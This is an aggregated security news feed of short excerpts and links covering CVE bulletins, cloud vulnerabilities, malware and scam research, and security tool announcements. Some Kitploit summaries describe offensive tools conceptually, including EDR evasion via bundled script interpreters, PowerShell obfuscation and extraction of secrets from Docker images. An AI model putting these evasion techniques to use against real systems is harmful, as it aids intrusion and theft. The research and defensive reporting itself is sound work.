Publication Date: 2024/10/21 4:00 PM PDT Description: The Amazon.ApplicationLoadBalancer.Identity.AspNetCore repo contains Middleware that can be used in conjunction with the Application Load Balancer (ALB) OpenId Connect integration and can be used in any ASP.NET Core deployment scenario, including AWS Fargate, Amazon Elastic Kubernetes Service (Amazon EKS), Amazon Elastic Container Service (Amazon ECS), Amazon Elastic Compute Cloud (Amazon EC2), and AWS Lambda. In the JWT handling code, it performs signature validation but fails to validate the JWT issuer and signer identity. The signer omission, if combined with a scenario where the infrastructure owner allows internet traffic to the ALB targets (not a recommended configuration), can allow for JWT signing by an untrusted entity...
https://aws.amazon.com/security/security-bulletins/AWS-2024-012/

Continued Intense Scanning From One IP in Lithuania
Plus a few interesting changes in the CVEs we track, and some notes on just what kinds of malware stagers we see.
https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-september-2024

Missing JWT issuer and signer validation in ALB middleware

https://www.cloudvulndb.org/missing-jwt-issuer

Data exfil via VPC endpoint denials in CloudTrail
CloudTrail delivered events to the resource owner and API caller even when the API action was denied by the VPC endpoint policy. This could have enabled a stealthy data exfiltration method in cases where an attacker had previously compromised a VPC, by smuggling data through the user agent field in denied requests.
https://www.cloudvulndb.org/vpc-endpoint-log-data-exfil

Protecting Your Website From DDoS Attack
Distributed denial-of-service attacks pose an increasing threat to organizations, with even some of the largest firms suffering significant disruptions from such attacks. Attackers use botnets of compromised IoT devices to... The post Protecting Your Website From DDoS Attack appeared first on Hacker Combat.
https://www.hackercombat.com/ddos-attack/

Subdomain Takeover Vulnerability in GitLab Pages
A vulnerability in GitLab Pages allowed attackers to take over dangling custom domains pointing to 'instanceX.gitlab.io'. The issue occurred when adding an unverified custom domain to GitLab Pages, which serves content for 7 days before disabling. This could lead to cookie stealing, phishing campaigns, and bypassing of Content-Security Policies and CORS.
https://www.cloudvulndb.org/subdomain-takeover-vulnerability-gitlab-pages

Effective Fuzzing: A Dav1d Case Study
Guest post by Nick Galloway, Senior Security Engineer, 20% time on Project Zero. Late in 2023, while working on a 20% project with Project Zero, I found an integer overflow in the dav1d AV1 video decoder. That integer overflow leads to an out-of-bounds write to memory. Dav1d 1.4.0 patched this, and it was assigned CVE-2024-1580. After the disclosure, I received some questions about how this issue was discovered, since dav1d is already being fuzzed by at least oss-fuzz. This blog post explains what happened. It’s a useful case study in how to construct fuzzers to exercise as much code as possible. But first, some background... Background: Dav1d. Dav1d is a highly-optimized AV1 decoder. AV1 is a royalty-free video coding format developed by the Alliance...
https://googleprojectzero.blogspot.com/2024/10/effective-fuzzing-dav1d-case-study.html

Issue with NVIDIA Container Toolkit (CVE-2024-0132, CVE-2024-0133)
Publication Date: 2024/10/01 6:35 PM PDT AWS is aware of CVE-2024-0132 and CVE-2024-0133, issues affecting the NVIDIA container toolkit 1.16. At this time, the following services require customer action. If we become aware of additional impact, we will update this bulletin. Amazon Elastic Container Service (Amazon ECS) Amazon ECS has released updated ECS GPU-optimized Amazon Machine Images (AMIs) with the patched NVIDIA container toolkit v1.16.2. We recommend that ECS customers update to these AMIs (or the latest available). Additional information on the ECS-optimized AMI is available at in our "Amazon ECS-optimized Linux AMIs" developer guide. Amazon Elastic Kubernetes Service (Amazon EKS) Amazon EKS has released updated EKS GPU-optimized Amazon Machine Images...
https://aws.amazon.com/security/security-bulletins/AWS-2024-010/

Lies, damned lies, and Impact Hero (refoorest, allcolibri)
Transparency note: According to Colibri Hero, they attempted to establish a business relationship with eyeo, a company that I co-founded. I haven't been in an active role at eyeo since 2018, and I left the company entirely in 2021. Colibri Hero was only founded in 2021. My investigation here was prompted by a blog comment. Colibri Hero (also known as allcolibri) is a company with a noble mission: We want to create a world where organizations can make a positive impact on people and communities. One of the company's products is the refoorest browser extension, promising to make a positive impact on the climate by planting trees. Best of it: this costs users nothing whatsoever. According to the refoorest website: Plantation financed by our partners So the users merely need to have the...
https://palant.info/2024/10/01/lies-damned-lies-and-impact-hero-refoorest-allcolibri/

SafeLine - Serve As A Reverse Proxy To Protect Your Web Services From Attacks And Exploits
SafeLine is a self-hosted WAF (Web Application Firewall) to protect your web apps from attacks and exploits. A web application firewall helps protect web apps by filtering and monitoring HTTP traffic between a web application and the Internet. It typically protects web apps from attacks such as SQL injection, XSS, code injection, OS command injection, CRLF injection, LDAP injection, XPath injection, RCE, XXE, SSRF, path traversal, backdoor, bruteforce, HTTP flood, bot abuse, among others. How It Works: By deploying a WAF in front of a web application, a shield is placed between the web application and the Internet. While a proxy server protects a client machine's identity by using an intermediary, a WAF is a type of reverse proxy, protecting the server from exposure by having clients pass...
http://www.kitploit.com/2024/09/safeline-serve-as-reverse-proxy-to.html

PolyDrop - A BYOSI (Bring-Your-Own-Script-Interpreter) Rapid Payload Deployment Toolkit
BYOSI - Bring-Your-Own-Script-Interpreter - Leveraging the abuse of trusted applications, one is able to deliver a compatible script interpreter for a Windows, Mac, or Linux system as well as malicious source code in the form of the specific script interpreter of choice. Once both the malicious source code and the trusted script interpreter are safely written to the target system, one could simply execute said source code via the trusted script interpreter. PolyDrop - Leverages thirteen scripting languages to perform the above attack. The following languages are wholly ignored by AV vendors including MS-Defender: - tcl - php - crystal - julia - golang - dart - dlang - vlang - nodejs - bun - python - fsharp - deno All of these languages were allowed to completely execute, and...
http://www.kitploit.com/2024/09/polydrop-byosi-bring-your-own-script.html

Secator - The Pentester's Swiss Knife
secator is a task and workflow runner used for security assessments. It supports dozens of well-known security tools and it is designed to improve productivity for pentesters and security researchers. Features Curated list of commands Unified input options Unified output schema CLI and library usage Distributed options with Celery Complexity from simple tasks to complex workflows Customizable Supported tools secator integrates the following tools: Name Description Category httpx Fast HTTP prober. http cariddi Fast crawler and endpoint secrets / api keys / tokens matcher. http/crawler gau Offline URL crawler (Alien Vault, The Wayback Machine, Common Crawl, URLScan). http/crawler gospider Fast web spider written in Go. http/crawler katana Next-generation crawling...
http://www.kitploit.com/2024/09/secator-pentesters-swiss-knife.html

Damn-Vulnerable-Drone - An Intentionally Vulnerable Drone Hacking Simulator Based On The Popular ArduPilot/MAVLink Architecture, Providing A Realistic Environment For Hands-On Drone Hacking
The Damn Vulnerable Drone is an intentionally vulnerable drone hacking simulator based on the popular ArduPilot/MAVLink architecture, providing a realistic environment for hands-on drone hacking. About the Damn Vulnerable Drone What is the Damn Vulnerable Drone? The Damn Vulnerable Drone is a virtually simulated environment designed for offensive security professionals to safely learn and practice drone hacking techniques. It simulates real-world ArduPilot & MAVLink drone architectures and vulnerabilities, offering a hands-on experience in exploiting drone systems. Why was it built? The Damn Vulnerable Drone aims to enhance offensive security skills within a controlled environment, making it an invaluable tool for intermediate-level security professionals, pentesters, and hacking enthusiasts....
http://www.kitploit.com/2024/09/damn-vulnerable-drone-intentionally.html

File-Unpumper - Tool That Can Be Used To Trim Useless Things From A PE File Such As The Things A File Pumper Would Add
file-unpumper is a powerful command-line utility designed to clean and analyze Portable Executable (PE) files. It provides a range of features to help developers and security professionals work with PE files more effectively. Features PE Header Fixing: file-unpumper can fix and align the PE headers of a given executable file. This is particularly useful for resolving issues caused by packers or obfuscators that modify the headers. Resource Extraction: The tool can extract embedded resources from a PE file, such as icons, bitmaps, or other data resources. This can be helpful for reverse engineering or analyzing the contents of an executable. Metadata Analysis: file-unpumper provides a comprehensive analysis of the PE file's metadata, including information about the machine...
http://www.kitploit.com/2024/09/file-unpumper-tool-that-can-be-used-to.html

Mass-Assigner - Simple Tool Made To Probe For Mass Assignment Vulnerability Through JSON Field Modification In HTTP Requests
Mass Assigner is a powerful tool designed to identify and exploit mass assignment vulnerabilities in web applications. It achieves this by first retrieving data from a specified request, such as fetching user profile data. Then, it systematically attempts to apply each parameter extracted from the response to a second request provided, one parameter at a time. This approach allows for the automated testing and exploitation of potential mass assignment vulnerabilities. Disclaimer This tool actively modifies server-side data. Please ensure you have proper authorization before use. Any unauthorized or illegal activity using this tool is entirely at your own risk. Features Enables the addition of custom headers within requests Offers customization of various HTTP methods for both origin and...
http://www.kitploit.com/2024/09/mass-assigner-simple-tool-made-to-probe.html

A Single IP is Scanning Intensely, and Yields a List of Malware Loaders
Overall scanning for CVEs we track is down, but one specific scanner caught our attention. We dig into what it’s doing.
https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024

Imperius - Make A Linux Kernel Rootkit Visible Again
Makes an LKM rootkit visible again. This tool is part of research on LKM rootkits that will be launched. It involves getting the memory address of a rootkit's "show_module" function, for example, and using that to call it, adding it back to lsmod, making it possible to remove an LKM rootkit. We can obtain the function address in very simple kernels using /sys/kernel/tracing/available_filter_functions_addrs; however, it is only available from kernel 6.5x onwards. An alternative to this is to scan the kernel memory, and later add it to lsmod again, so it can be removed. So in summary, this LKM abuses the function of LKM rootkits that have the functionality to become visible again. OBS: There is another trick of removing/defusing a LKM rootkit, but it will be in the research that will...
http://www.kitploit.com/2024/09/imperius-make-linux-kernel-rootkit.html

BYOSI - Evade EDR's The Simple Way, By Not Touching Any Of The API's They Hook
Evade EDR's the simple way, by not touching any of the API's they hook. Theory I've noticed that most EDRs fail to scan scripting files, treating them merely as text files. While this might be unfortunate for them, it's an opportunity for us to profit. Flashy methods like residing in memory or thread injection are heavily monitored. Without a binary signed by a valid Certificate Authority, execution is nearly impossible. Enter BYOSI (Bring Your Own Scripting Interpreter). Every scripting interpreter is signed by its creator, with each certificate being valid. Testing in a live environment revealed surprising results: a highly signatured PHP script from this repository not only ran on systems monitored by CrowdStrike and Trellix but also established an external connection without triggering...
http://www.kitploit.com/2024/09/byosi-evade-edrs-simple-way-by-not.html

Psobf - PowerShell Obfuscator
Tool for obfuscating PowerShell scripts written in Go. The main objective of this program is to obfuscate PowerShell code to make its analysis and detection more difficult. The script offers 5 levels of obfuscation, from basic obfuscation to script fragmentation. This allows users to tailor the obfuscation level to their specific needs. ./psobf -h ...
http://www.kitploit.com/2024/09/psobf-powershell-obfuscator.html

CloudImposer
Google Cloud Composer is a managed service for Apache Airflow. Tenable discovered that the Cloud Composer package was vulnerable to dependency confusion, which could have allowed attackers to inject malicious code when the package was compiled from source. This could have led to remote code execution on machines running Cloud Composer, which include various other GCP services as well as internal servers at Google. The dependency confusion stemmed from Google's risky recommendation in their documentation to use the --extra-index-url argument when installing private Python packages. Following disclosure, Google fixed the dependency confusion vulnerability and also updated their documentation.
https://www.cloudvulndb.org/cloudimposer-gcp

Document AI data exfiltration
The Document AI service unintentionally allows users to read any Cloud Storage object in the same project, in a way that isn't properly documented. The Document AI service agent is auto-assigned with excessive permissions, allowing it to access all objects from Cloud Storage buckets in the same project. Malicious actors can exploit this to exfiltrate data from Cloud Storage by indirectly leveraging the service agent's permissions. This vulnerability is an instance of transitive access abuse, a class of security flaw where unauthorized access is gained indirectly through a trusted intermediary.
https://www.cloudvulndb.org/gcp-document-ai-data-exfil

ModTracer - ModTracer Finds Hidden Linux Kernel Rootkits And Then Makes Them Visible Again
ModTracer finds hidden Linux kernel rootkits and then makes them visible again. Another way to make an LKM visible is using the Imperius trick: https://github.com/MatheuZSecurity/Imperius
http://www.kitploit.com/2024/09/modtracer-modtracer-finds-hidden-linux.html

DockerSpy - DockerSpy Searches For Images On Docker Hub And Extracts Sensitive Information Such As Authentication Secrets, Private Keys, And More
DockerSpy searches for images on Docker Hub and extracts sensitive information such as authentication secrets, private keys, and more. What is Docker? Docker is an open-source platform that automates the deployment, scaling, and management of applications using containerization technology. Containers allow developers to package an application and its dependencies into a single, portable unit that can run consistently across various computing environments. Docker simplifies the development and deployment process by ensuring that applications run the same way regardless of where they are deployed. About Docker Hub Docker Hub is a cloud-based repository where developers can store, share, and distribute container images. It serves as the largest library of container images, providing access...
http://www.kitploit.com/2024/09/dockerspy-dockerspy-searches-for-images.html

ClamAV 1.4.1, 1.3.2, 1.0.7, and 0.103.12 security patch versions published
Today, we are publishing the 1.4.1, 1.3.2, 1.0.7, and 0.103.12 security patch versions. The release files for the patch versions are available for download on the ClamAV downloads page, on the GitHub Release page, and (with exception to 0.103.12) through Docker Hub. The images on Docker Hub may not be immediately available on release day. Continue reading to learn what changed in each version. 1.4.1: ClamAV 1.4.1 is a critical patch release with the following fixes: CVE-2024-20506: Changed the logging module to disable following symlinks on Linux and Unix systems so as to prevent an attacker with existing access to the 'clamd' or 'freshclam' services from using a symlink to corrupt system files. This issue affects all currently supported versions. It will be fixed in: 1.4.1, 1.3.2, 1.0.7, 0.103.12. Thank...
http://blog.clamav.net/2024/09/clamav-141-132-107-and-010312-security.html

CVE-2024-38063 - Remotely Exploiting The Kernel Via IPv6
Performing a root cause analysis & building proof-of-concept for CVE-2024-38063, a CVSS 9.8 Vulnerability In the Windows Kernel IPv6 Parser
https://malwaretech.com/2024/08/exploiting-CVE-2024-38063.html

Copilot Studio information disclosure via SSRF

https://www.cloudvulndb.org/copilot-studio-infoleak-ssrf

ClamAV 1.4.0 feature release and ClamAV bytecode compiler 1.4.0 release
The ClamAV 1.4.0 feature release is now stable. We encourage everyone to download the latest version now from the ClamAV downloads page, on the GitHub Release page, and through Docker Hub*: Alpine-based images; Debian-based multi-arch images. *The Docker images are built on release day and will be made available when they are ready. We are also publishing ClamAV bytecode compiler version 1.4.0. The ClamAV bytecode compiler release files are available for download on the GitHub Release page and through Docker Hub. ClamAV platform support changes: We will no longer provide Linux 32-bit packages. With RHEL 7 reaching end-of-life, we had to upgrade our build hosts and selected Alma Linux 8. Alma Linux does not provide 32-bit images. ClamAV users on 32-bit platforms can still build from source. We now provide...
http://blog.clamav.net/2024/08/clamav-140-feature-release-and-clamav.html

CryptoCore: Unmasking the Sophisticated Cryptocurrency Scam Operations
As digital currencies have grown, so have cryptocurrency scams, posing significant user risks. The rise of AI and deepfake technology has intensified scams exploiting famous personalities and events by creating realistic fake videos. Platforms like X and YouTube have been especially targeted, with scammers hijacking high-profile accounts to distribute fraudulent content. This report delves into the CryptoCore group's complex scam operations, analyzing their use of deepfakes, hijacked accounts, and fraudulent websites to deceive victims and profit millions of dollars. The post CryptoCore: Unmasking the Sophisticated Cryptocurrency Scam Operations appeared first on Avast Threat Labs.
https://decoded.avast.io/martinchlumecky1/cryptocore-unmasking-the-sophisticated-cryptocurrency-scam-operations/?utm_source=rss&utm_medium=rss&utm_campaign=cryptocore-unmasking-the-sophisticated-cryptocurrency-scam-operations

RADIUS Protocol CVE-2024-3596
A fundamental design flaw within the RADIUS protocol has been proven to be exploitable, compromising the integrity in the RADIUS Access-Request process. The attack allows a malicious user to modify packets in a way that would be indistinguishable to a RADIUS client or server. To be successful, the attacker must have the ability to inject themselves between the client and server. Revised on 2025-03-14 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-255

Azure Health privilege escalation via SSRF

https://www.cloudvulndb.org/azure-health-pe-ssrf

ClamAV 0.103 LTS End of Life Announcement
The ClamAV 0.103 LTS release is nearing end-of-life (EOL) with regards to security vulnerability fix support from our team. This end of life date will be Sept. 14, 2024. ClamAV 0.103 users will be able to update signatures from the official database mirror for an additional one year after the EOL date. After Sept. 14, 2025, we may block ClamAV 0.103 from downloading signature updates. We recommend that users update to the newest LTS release, ClamAV 1.0.6. For users that want to upgrade to the newest non-LTS release, use ClamAV 1.3.1. The most recent version of ClamAV can be found here: https://www.clamav.net/downloads The following is a list of major changes available to users in the newest versions of ClamAV. Since ClamAV 0.103, ClamAV 1.0 LTS adds: - A...
http://blog.clamav.net/2024/08/clamav-0103-lts-end-of-life-announcement.html

60 Hurts per Second – How We Got Access to Enough Solar Power to Run the United States
The electricity grid – the buzzing, crackling marvel that supplies the lifeblood of modernity - is by far the largest structure humanity ever built. It's so big, in fact, that few people even notice it, like a fish can't see the ocean. Until the grid goes down, that is. Then, like the fish dangling from the angler's hook, we see our vulnerability. Modernity dissolves into a sudden silence, followed by the repeated flick of a light switch, and a howl of panic at the prospect of missed appointmen
https://www.bitdefender.com/en-us/blog/labs/60-hurts-per-second-how-we-got-access-to-enough-solar-power-to-run-the-united-states

Issue with AWS Client VPN - CVE-2024-30164, CVE-2024-30165
Publication Date: 2024/07/16 3:30 PM PDT AWS is aware of CVE-2024-30164 and CVE-2024-30165 in AWS Client VPN. These issues could potentially allow an actor with access to an end user's device to escalate to root privilege and execute arbitrary commands on that device. We addressed these issues on all platforms. Customers using AWS Client VPN should upgrade to version 3.11.1 or higher for Windows, 3.9.2 or higher for MacOS, and 3.12.1 or higher for Linux. For additional information on configuring AWS Client VPN to meet your security and compliance requirements, please refer to our "Security in AWS Client VPN" user guide. We would like to thank Robinhood for collaborating on this issue through the coordinated vulnerability disclosure process. Security-related questions...
https://aws.amazon.com/security/security-bulletins/AWS-2024-008/

Issue with PyTorch TorchServe - CVE-2024-35198, CVE-2024-35199
Publication Date: 2024/07/18 2:50 PM PDT AWS is aware of the issues described in CVE-2024-35198 and CVE-2024-35199 in PyTorch TorchServe versions 0.3.0 to 0.10.0. Customers using PyTorch inference Deep Learning Containers (DLC) through Amazon SageMaker are not affected. CVE-2024-35198 does not prevent a model from being downloaded into the model store if the URL contains characters such as ".." when TorchServe model registration API is called. Customers using PyTorch inference Deep Learning Containers (DLC) through Amazon SageMaker and Amazon Elastic Kubernetes Service (Amazon EKS) are not affected by this issue. CVE-2024-35199 does not bind two gRPC ports 7070 and 7071 to localhost by default. These two interfaces are bound to all interfaces when TorchServe is natively launched...
https://aws.amazon.com/security/security-bulletins/AWS-2024-009/

How insecure is Avast Secure Browser?
A while ago I already looked into Avast Secure Browser. Back then it didn't end well for Avast: I found critical vulnerabilities allowing arbitrary websites to infect user's computer. Worse yet: much of it was due to neglect of secure coding practices, existing security mechanisms were disabled for no good reason. I didn't finish that investigation because I discovered that the browser was essentially spyware, collecting your browsing history and selling it via Avast's Jumpshot subsidiary. But that was almost five years ago. After an initial phase of denial, Avast decided to apologize and to wind down Jumpshot. It was certainly a mere coincidence that Avast was subsequently sold to NortonLifeLock, called Gen Digital today. Yes, Avast is truly reformed and paying for their crimes in...
https://palant.info/2024/07/15/how-insecure-is-avast-secure-browser/

Unauthorized Access to AWS Account Findings in Microsoft Defender for Cloud
Microsoft Defender for Cloud at one point provided customers with a flawed configuration template through their public GitHub repository. This template creates resources in the customer's AWS account so that Microsoft Defender for Cloud can scan it. In the rare cases in which this template was deployed, under certain, limited circumstances, Defender for Cloud's security findings for these AWS accounts could be disclosed to unauthorized third parties.
https://www.cloudvulndb.org/mdc-aws-findings-disclosure

Deep Dive on Supplement Scams: How AI Drives ‘Miracle Cures' and Sponsored Health-Related Scams on Social Media
Sponsored social media content has become increasingly present on feeds. Sponsored ads can often be beneficial as they are customized to suit online personas, offering relevant content tailored specifically for you. While personalized ads can help enhance your online experience, not all are legitimate. In fact, scams originating from phony ads on social media have increased dramatically, with potentially severe consequences for consumers. Sponsored supplement scams on social media platforms
https://www.bitdefender.com/en-us/blog/labs/deep-dive-on-supplement-scams-how-ai-drives-miracle-cures-and-sponsored-health-related-scams-on-social-media

Decrypted: DoNex Ransomware and its Predecessors
Researchers from Avast have discovered a flaw in the cryptographic schema of the DoNex ransomware and its predecessors. In cooperation with law enforcement organizations, we have been silently providing the decryptor to DoNex ransomware victims since March 2024. The cryptographic weakness was made public at Recon 2024 and therefore we have no reason to keep […]
https://decoded.avast.io/threatresearch/decrypted-donex-ransomware-and-its-predecessors/?utm_source=rss&utm_medium=rss&utm_campaign=decrypted-donex-ransomware-and-its-predecessors

The Windows Registry Adventure #3: Learning resources
Posted by Mateusz Jurczyk, Google Project Zero When tackling a new vulnerability research target, especially a closed-source one, I prioritize gathering as much information about it as possible. This gets especially interesting when it's a subsystem as old and fundamental as the Windows registry. In that case, tidbits of valuable data can lurk in forgotten documentation, out-of-print books, and dusty open-source code – each potentially offering a critical piece of the puzzle. Uncovering them takes some effort, but the payoff is often immense. Scraps of information can contain hints as to how certain parts of the software are implemented, as well as why – what were ...
https://googleprojectzero.blogspot.com/2024/06/the-windows-registry-adventure-3.html

Ashok - A OSINT Recon Tool, A.K.A Swiss Army Knife
Reconnaissance is the first phase of penetration testing: gathering information before any real attacks are planned. Ashok is a fast recon tool for penetration testers, designed specifically for the reconnaissance phase. Ashok v1.1 adds an advanced Google dorker and a Wayback crawling machine. Main features: Wayback Crawler Machine; Google Dorking without limits; GitHub information grabbing; subdomain identifier; CMS/technology detector with custom headers.
Installation:
git clone https://github.com/ankitdobhal/Ashok
cd Ashok
python3 -m pip install -r requirements.txt
How to use Ashok? A detailed usage guide is available in the Usage section of the Wiki. Some index of options is given below:...
http://www.kitploit.com/2024/06/ashok-osint-recon-tool-aka-swiss-army.html

Project Naptime: Evaluating Offensive Security Capabilities of Large Language Models
Posted by Sergei Glazunov and Mark Brand, Google Project Zero. Introduction: At Project Zero, we constantly seek to expand the scope and effectiveness of our vulnerability research. Though much of our work still relies on traditional methods like manual source code audits and reverse engineering, we're always looking for new approaches. As the code comprehension and general reasoning ability of Large Language Models (LLMs) has improved, we have been exploring how these models can reproduce the systematic approach of a human security researcher when identifying and demonstrating security vulnerabilities. We hope that in the future, this can close some of the blind spots of current automated vulnerability discovery approaches, and enable automated detection of "unfuzzable" vulnerabilities. ...
https://googleprojectzero.blogspot.com/2024/06/project-naptime.html

New Diamorphine rootkit variant seen undetected in the wild
Introduction: Code reuse is very frequent in malware, especially for those parts of the sample that are complex to develop or hard to write with an essentially different alternative code. By tracking both source code and object code, we efficiently detect new malware and track the evolution of existing malware in the wild. Diamorphine is a well-known […]
https://decoded.avast.io/davidalvarez/new-diamorphine-rootkit-variant-seen-undetected-in-the-wild/?utm_source=rss&utm_medium=rss&utm_campaign=new-diamorphine-rootkit-variant-seen-undetected-in-the-wild

Azure Machine Learning SSRF

https://www.cloudvulndb.org/azure-ml-ssrf-pt

Driving forward in Android drivers
Posted by Seth Jenkins, Google Project Zero. Introduction: Android's open-source ecosystem has led to an incredible diversity of manufacturers and vendors developing software that runs on a broad variety of hardware. This hardware requires supporting drivers, meaning that many different codebases carry the potential to compromise a significant segment of Android phones. There are recent public examples of third-party drivers containing serious vulnerabilities that are exploited on Android. While there exists a well-established body of public (and In-the-Wild) security research on Android GPU drivers, other chipset components may not be as frequently audited, so this research sought to explore those drivers in greater detail. Driver Enumeration: Not as Easy as it Looks. This...
https://googleprojectzero.blogspot.com/2024/06/driving-forward-in-android-drivers.html

Unfading Sea Haze: New Espionage Campaign in the South China Sea
Bitdefender researchers investigated a series of incidents at high-level organizations in countries of the South China Sea region, all performed by the same  threat actor we track as Unfading Sea Haze. Based on the victimology and the cyber-attack's aim, we believe the threat actor is aligned with China's interests. As tensions in the region rise, they are reflected in the intensification of activity on behalf of the Unfading Sea Haze actor, which uses new and improved tools and TTPs. We notice
https://www.bitdefender.com/en-us/blog/labs/unfading-sea-haze-new-espionage-campaign-in-the-south-china-sea

Notes on ThroughTek Kalay Vulnerabilities and Their Impact on the IoT Ecosystem
Since 2014, Bitdefender IoT researchers have been looking into the world's most popular IoT devices, hunting for vulnerabilities and undocumented attack avenues. This report documents four vulnerabilities affecting devices powered by the ThroughTek Kalay Platform. Due to the platform's massive presence in IoT integrations, these flaws have a significant downstream impact on several vendors. In the interconnected landscape of the Internet of Things (IoT), the reliability and security of devices,
https://www.bitdefender.com/en-us/blog/labs/notes-on-throughtek-kalay-vulnerabilities-and-their-impact

Avast Q1/2024 Threat Report
Nearly 90% of Threats Blocked are Social Engineering, Revealing a Huge Surge of Scams, and Discovery of the Lazarus APT Campaign.
https://decoded.avast.io/threatresearch/avast-q1-2024-threat-report/?utm_source=rss&utm_medium=rss&utm_campaign=avast-q1-2024-threat-report

ClamAV 1.4.0 release candidate now available!
The ClamAV 1.4.0 release candidate is now available. You may find the source code and installers for this release on the clamav.net/downloads page or the ClamAV GitHub release page. Tip: if you are downloading the source from the GitHub release page, the package labeled "clamav-1.4.0-rc.tar.gz" does not require an internet connection to build; all dependencies are included in this package. But if you download the ZIP or TAR.GZ generated by GitHub, located at the very bottom, an internet connection will be required during the build to download additional Rust dependencies. For Docker users, there is no specific Docker tag for the release candidate, but you can use the clamav:unstable or clamav:unstable_base tags. The release candidate phase is expected...
http://blog.clamav.net/2024/05/clamav-140-release-candidate-now.html

GuptiMiner: Hijacking Antivirus Updates for Distributing Backdoors and Casual Mining
Avast discovered and analyzed GuptiMiner, a malware campaign hijacking an eScan antivirus update mechanism to distribute backdoors and coinminers.
https://decoded.avast.io/janrubin/guptiminer-hijacking-antivirus-updates-for-distributing-backdoors-and-casual-mining/?utm_source=rss&utm_medium=rss&utm_campaign=guptiminer-hijacking-antivirus-updates-for-distributing-backdoors-and-casual-mining

From BYOVD to a 0-day: Unveiling Advanced Exploits in Cyber Recruiting Scams
Introduction: In the summer of 2023, Avast identified a campaign targeting specific individuals in the Asian region through fabricated job offers. The motivation behind the attack remains uncertain, but judging from the low frequency of attacks, it appears that the attacker had a special interest in individuals with technical backgrounds. This sophistication is […]
https://decoded.avast.io/luiginocamastra/from-byovd-to-a-0-day-unveiling-advanced-exploits-in-cyber-recruiting-scams/?utm_source=rss&utm_medium=rss&utm_campaign=from-byovd-to-a-0-day-unveiling-advanced-exploits-in-cyber-recruiting-scams

ClamAV 1.3.1, 1.2.3, 1.0.6 patch versions published
Today, we are publishing the 1.3.1, 1.2.3, and 1.0.6 security patch versions. The release files for the patch versions are available for download on the ClamAV downloads page, on the GitHub Release page, and through Docker Hub. The images on Docker Hub may not be immediately available on release day. Continue reading to learn what changed in each version. 1.3.1: ClamAV 1.3.1 is a critical patch release with the following fixes. CVE-2024-20380: fixed a possible crash in the HTML file parser that could cause a denial-of-service (DoS) condition. This issue affects version 1.3.0 only and does not affect prior versions. Thank you to Błażej Pawłowski for identifying this issue (GitHub pull request). Updated select Rust dependencies to the latest versions; this resolved Cargo audit complaints and included...
http://blog.clamav.net/2024/04/clamav-131-123-106-patch-versions.html

Vulnerabilities Identified in LG WebOS
As the creator of the world's first smart home cybersecurity hub, Bitdefender regularly audits popular IoT hardware for vulnerabilities. This research paper is part of a broader program that aims to shed light on the security of the world's best-sellers in the IoT space. This report covers vulnerabilities discovered while researching the LG WebOS TV operating system. We have found several issues affecting WebOS versions 4 through 7 running on LG TVs. These vulnerabilities let us gain root access...
https://www.bitdefender.com/en-us/blog/labs/vulnerabilities-identified-in-lg-webos

AI meets next-gen info stealers in social media malvertising campaigns
The impact that AI has on society has steadily crept into the darkest nooks and crannies of the internet. So much so that cybercrooks are hitching free rides on the AI bandwagon by leveraging the increased demand of AI-powered software for content creators. Cybercriminal groups constantly adapt their operating methods and tools to stay a step ahead of potential victims. Highly focused on enhancing their deceptive practices, threat actors have, unfortunately, found a most reliable and powerful a
https://www.bitdefender.com/en-us/blog/labs/ai-meets-next-gen-info-stealers-in-social-media-malvertising-campaigns

Numerous vulnerabilities in Xunlei Accelerator application
Xunlei Accelerator (迅雷客户端), a.k.a. Xunlei Thunder, by the China-based Xunlei Ltd. is a wildly popular application. According to the company's annual report, 51.1 million active users were counted in December 2022. The company's Google Chrome extension 迅雷下载支持, while not mandatory for using the application, had 28 million users at the time of writing. I've found this application to expose a massive attack surface. This attack surface is largely accessible to arbitrary websites that an application user happens to be visiting. Some of it can also be accessed from other computers in the same network or by attackers with the ability to intercept users' network connections (man-in-the-middle attack). It does not appear that security concerns were considered in the design...
https://palant.info/2024/03/06/numerous-vulnerabilities-in-xunlei-accelerator-application/

Sponsored Ad Fraud: Mystery Box Scams Flood Social Media
Social media platforms are overflowing with scams. In the past couple of months, Bitdefender Labs has been monitoring a steep increase in fraudulent social media ads on Facebook promoting various swindles ranging from crypto-doubling to AI-generated celebrity-endorsed giveaways. Our latest analysis has spotted a consistent trend, with fraudsters continuing to exploit Meta's ad system to deceive consumers. The hustle? A long-established ruse that involves peddling so-called mystery boxes from
https://www.bitdefender.com/en-us/blog/labs/sponsored-ad-fraud-mystery-box-scams-flood-social-media

Lazarus and the FudModule Rootkit: Beyond BYOVD with an Admin-to-Kernel Zero-Day
The Lazarus Group is back with an upgraded variant of their FudModule rootkit, this time enabled by a zero-day admin-to-kernel vulnerability tracked as CVE-2024-21338. Read this blog for a detailed analysis of this rootkit variant and learn more about several new techniques, including a handle table entry manipulation technique that directly targets Microsoft Defender, CrowdStrike Falcon, and HitmanPro.
https://decoded.avast.io/janvojtesek/lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day/?utm_source=rss&utm_medium=rss&utm_campaign=lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day

When Stealers Converge: New Variant of Atomic Stealer in the Wild
Here at Bitdefender, we're constantly working on improving detection capabilities for our macOS cyber-security products; part of this effort involves revisiting old (or digging up new) samples from our malware zoo. During routine verifications, we were able to isolate multiple suspicious and undetected macOS disk image files surprisingly small for files of this kind (1.3 MB per file). A short look into the code revealed that these files are significantly similar to other samples analysed in the
https://www.bitdefender.com/en-us/blog/labs/when-stealers-converge-new-variant-of-atomic-stealer-in-the-wild

Details on Apple's Shortcuts Vulnerability: A Deep Dive into CVE-2024-23204
CVE-2024-23204 sheds light on the critical importance of continuous security vigilance. Apple's Shortcuts application, designed to enhance user automation, can inadvertently become a potential vector for privacy breaches. This analysis aims to provide users, developers, and security professionals with insights into the nature of the vulnerability, its potential impact, and recommended mitigation measures. At a glance: * We have discovered a vulnerability in Apple Shortcuts that lets a potent
https://www.bitdefender.com/en-us/blog/labs/details-on-apples-shortcuts-vulnerability-a-deep-dive-into-cve-2024-23204

Bypassing EDRs With EDR-Preloading
Evading user mode EDR hooks by hijacking the AppVerifier layer
https://malwaretech.com/2024/02/bypassing-edrs-with-edr-preload.html

ClamAV 1.3.0 feature release and 1.2.2, 1.0.5 security patch release!
